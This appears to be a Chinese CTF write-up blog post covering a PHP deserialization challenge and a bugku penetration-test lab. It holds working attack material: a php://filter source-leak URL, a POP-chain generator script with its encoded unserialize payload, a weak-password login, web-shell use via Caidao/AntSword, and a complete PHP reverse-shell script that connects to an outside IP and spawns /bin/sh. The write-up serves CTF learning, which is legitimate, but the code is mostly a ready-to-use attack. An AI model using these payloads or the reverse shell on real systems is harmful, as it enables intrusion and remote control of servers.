web

留个记录点

目前web-033依然在更新，这个篇目留给其它题。

Web-unse

原始信息

如下：

 <?php
    include("./test.php");
    if(isset($_GET['fun'])){
        if(justafun($_GET['fun'])){
            include($_GET['fun']);
        }
    }else{
        unserialize($_GET['yourcode']);
    }
    highlight_file(__FILE__);
?>

解题

尝试使用伪协议进行攻击：

?fun=php://filter/read=convert.base64-encode/resource=test.php

获取到的文件内容：

<?php  
    $test = "Hello world";

include "flag.php";


function justafun($filename){
    $result = preg_match("/flag|zlib|string/i", $filename);
    if($result){
        return FALSE;
    }
    return TRUE;
}

class afun { 
    private $a; 
    function __wakeup(){ 
        $temp = $this->a . 'ctf'; 
    } 
} 

class bfun { 
    private $items = array(); 
    public function __toString() { 
        $item = $this->items; 
        $str = $item['dd']->knife; 
        return 'what the good?'; 
    } 
} 

class cfun { 
    private $params = array(); 
    public function __get($key) {  
        global $flag;
        $tmp = $this->params[$key];
        var_dump($$tmp); 
    }
}

开始复写类,生成payload：

<?php
class afun
{
    public $a;
    public function __construct()
    {
        $this->a = new bfun();
    }

    function __wakeup()
    {
        $temp = $this->a . 'ctf';
    }
}

class bfun
{
    public $items;
    public function __construct()
    {
        $this->items = array('dd' => new cfun());
    }
    public function __toString()
    {
        $item = $this->items;
        $str = $item['dd']->knife;
        return 'what the good?';
    }
}
class cfun
{
    public $params;
    public function __construct()
    {
        $this->params = array('knife' => 'flag');
    }

    public function __get($key)
    {
        global $flag;
        $tmp = $this->params[$key];
        var_dump($flag);
        var_dump($params);
        var_dump($$tmp);
    }
}

$b = new afun();
echo urlencode(serialize($b));

获得的内容如下：

?fun=O%3A4%3A%22afun%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A4%3A%22bfun%22%3A1%3A%7Bs%3A5%3A%22items%22%3Ba%3A1%3A%7Bs%3A2%3A%22dd%22%3BO%3A4%3A%22cfun%22%3A1%3A%7Bs%3A6%3A%22params%22%3Ba%3A1%3A%7Bs%3A5%3A%22knife%22%3Bs%3A4%3A%22flag%22%3B%7D%7D%7D%7D%7D

放入url访问即可得到flag：

?yourcode=O%3A4%3A%22afun%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A4%3A%22bfun%22%3A1%3A%7Bs%3A5%3A%22items%22%3Ba%3A1%3A%7Bs%3A2%3A%22dd%22%3BO%3A4%3A%22cfun%22%3A1%3A%7Bs%3A6%3A%22params%22%3Ba%3A1%3A%7Bs%3A5%3A%22knife%22%3Bs%3A4%3A%22flag%22%3B%7D%7D%7D%7D%7D

资料参考：https://blog.csdn.net/qq_42181428/article/details/87090539

bugku - rip -渗透测试1

原始信息

一个站点。

解题

flag1

第一个flag：访问网站后查看网站源代码，搜索flag即可。

flag2

第二个flag：上一个flag末尾给出提示，下一个flag在管理员页面。尝试访问管理员页面 /admin ，弱口令爆破出账密 admin/admin 翻找的时候找到flag。

flag3

同时提示 /home

在后端找到一个php学习的站点，发现能直接执行php，尝试写个shell。

写完后使用菜刀直接连接，转到home目录下，找到flag：

新的提示信息：root and database

flag4

提示使用database搞事情

菜刀不知道怎的搞不来，使用蚁剑链接测试：

连接上得到flag后，看到新的提示是用nc过pwn，使用nc去试试：

flag5

本想使用nc反弹shell，现在看来只能使用其它办法了.

这是某位博主的脚本：

<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '1.12.x.x';  // CHANGE THIS
$port = 4567;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
        // Fork and have the parent process exit
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }

        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }
        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}
chdir("/");
umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
        printit("$errstr ($errno)");
        exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
        exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
        if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
        }
        if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
        }
        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
        if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ");
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input");
                fwrite($pipes[0], $input);
        }
        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ");
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input");
                fwrite($sock, $input);
        }
        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
        if (!$daemon) {
                print "$string\n";
        }
}
?>